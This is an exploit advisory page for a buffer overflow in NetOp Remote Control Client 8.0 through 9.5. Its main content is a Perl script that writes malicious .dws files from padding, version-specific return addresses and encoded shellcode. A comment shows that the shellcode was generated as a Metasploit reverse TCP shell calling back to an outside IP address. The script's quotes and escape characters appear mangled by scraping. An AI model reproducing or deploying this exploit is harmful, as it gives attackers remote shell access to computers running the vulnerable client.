NetOp Remote Control Client Buffer Overflow Exploit

Summary

NetOp Remote Control Client 9.5 suffers from buffer overflow vulnerability..

Credit:

The information has been provided by chap0.


Details

Vulnerable Systems:
 * NetOp Remote Control Client 9.5

$file0 = ‘netop80.dws’;
$file1 = ‘netop91.dws’;
$file2 = ‘netop92.dws’;
$file3 = ‘netop95.dws’;

my $junk=’x41′ x 524;

my $ret0 = ‘x9BxC2x40x20’; #0x2040C29B [nupdate.dll]
my $ret1 = ‘xB3xE9x3Dx20’; #0x203DE9B3 [nupdate.dll]
my $ret2 = ‘x1BxFCx44x20’; #0x2044FC1B [nupdate.dll]
my $ret3 = ‘x13x26xB5x20’; #0x20B52613 [nupdate.dll]

my $extra = ‘x41’ x 20;

#./msfpayload windows/shell_reverse_tcp LHOST=172.16.20.27 LPORT=443 R | msfencode -a x86 -b ‘x00x0ax0d’ -t perl
#[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

my $shellcode= ‘xb8x34xc1xf5xccxdbxd1xd9x74x24xf4x5ax33xc9’ .
‘xb1x4fx31x42x14x03x42x14x83xc2x04xd6x34x09’ .
‘x24x9fxb7xf2xb5xffx3ex17x84x2dx24x53xb5xe1’ .
‘x2ex31x36x8ax63xa2xcdxfexabxc5x66xb4x8dxe8’ .
‘x77x79x12xa6xb4x18xeexb5xe8xfaxcfx75xfdxfb’ .
‘x08x6bx0exa9xc1xe7xbdx5dx65xb5x7dx5cxa9xb1’ .
‘x3ex26xccx06xcax9cxcfx56x63xabx98x4ex0fxf3’ .
‘x38x6exdcxe0x05x39x69xd2xfexb8xbbx2bxfex8a’ .
‘x83xe7xc1x22x0exf6x06x84xf1x8dx7cxf6x8cx95’ .
‘x46x84x4ax10x5bx2ex18x82xbfxcexcdx54x4bxdc’ .
‘xbax13x13xc1x3dxf0x2fxfdxb6xf7xffx77x8cxd3’ .
‘xdbxdcx56x7ax7dxb9x39x83x9dx65xe5x21xd5x84’ .
‘xf2x53xb4xc0x37x69x47x11x50xfax34x23xffx50’ .
‘xd3x0fx88x7ex24x6fxa3xc6xbax8ex4cx36x92x54’ .
‘x18x66x8cx7dx21xedx4cx81xf4xa1x1cx2dxa7x01’ .
‘xcdx8dx17xe9x07x02x47x09x28xc8xfex0exbfx5f’ .
‘x10x84x5bxc8x13xa4x5axb3x9dx42x36xd3xcbxdd’ .
‘xafx4ax56x95x4ex92x4cx3dxf2x01x0bxbdx7dx3a’ .
‘x84xeax2ax8cxddx7exc7xb7x77x9cx1ax21xbfx24’ .
‘xc1x92x3exa5x84xafx64xb5x50x2fx21xe1x0cx66’ .
‘xffx5fxebxd0xb1x09xa5x8fx1bxddx30xfcx9bx9b’ .
‘x3cx29x6ax43x8cx84x2bx7cx21x41xbcx05x5fxf1’ .
‘x43xdcxdbx01x0ex7cx4dx8axd7x15xcfxd7xe7xc0’ .
‘x0cxeex6bxe0xecx15x73x81xe9x52x33x7ax80xcb’ .
‘xd6x7cx37xebxf2’;

print<<EOF;
NetOp Remote Control Buffer Overflow
By chap0 – www.seek-truth.net
Choose a number for the version of NetOp are you attacking:
0 – NetOp 8.0
1 – NetOp 9.1
2 – NetOp 9.2
3 – Netop 9.5

EOF

print ‘Selection: ‘;
chomp ($select = <STDIN>);

if ($select =~ 0) {

print ‘Creating payload for NetOp 8.0n’;

my $payload=$junk.$ret0.$extra.$shellcode;

open(FILE,’>$file0′);
print FILE $payload;
close(FILE);

print ‘Done.n’;

}

elsif ($select =~ 1) {

print ‘Creating payload for NetOp 9.1n’;

my $payload=$junk.$ret1.$extra.$shellcode;

open(FILE,’>$file1′);
print FILE $payload;
close(FILE);

print ‘Done.n’;

}

elsif ($select =~ 2) {

print ‘Creating payload for NetOp 9.2n’;

my $payload=$junk.$ret2.$extra.$shellcode;

open(FILE,’>$file2′);
print FILE $payload;
close(FILE);

print ‘Done.n’;

}

elsif ($select =~ 3) {

print ‘Creating payload for NetOp 9.5n’;

my $payload=$junk.$ret3.$extra.$shellcode;

open(FILE,’>$file3′);
print FILE $payload;
close(FILE);

print ‘Done.n’;

}

elsif ($select =~ ”) {

print ‘Please make a selection.n’;

}

Disclosure Timeline:
Published: 2011-04-28

Categories: Exploits